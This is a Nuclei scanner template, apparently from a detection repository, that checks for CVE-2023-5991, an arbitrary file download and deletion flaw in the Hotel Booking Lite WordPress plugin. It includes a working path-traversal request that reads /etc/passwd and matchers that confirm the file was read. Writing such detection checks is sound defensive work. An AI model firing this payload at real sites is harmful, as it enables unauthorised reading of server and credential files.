52 lines
1.7 KiB
YAML
52 lines
1.7 KiB
YAML
id: CVE-2023-5991
|
|
|
|
info:
|
|
name: Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion
|
|
author: Kazgangap
|
|
severity: critical
|
|
description: |
|
|
The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server
|
|
remediation: Fixed in 4.8.5
|
|
reference:
|
|
- https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-5991
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-5991
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00603
|
|
epss-percentile: 0.78412
|
|
cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: motopress
|
|
product: hotel_booking_lite
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/motopress-hotel-booking"
|
|
tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "filename="
|
|
- "/etc/passwd"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220014d0afbf313c77eebbf17a87a636bfffda4e29359e40ad4ca50e421977f9c0f022049fddedfdc464a6562d4ed201b1cac4fb18011eeb933ff7d55619d9325b667ff:922c64590222798bb761d5b6d8e72950 |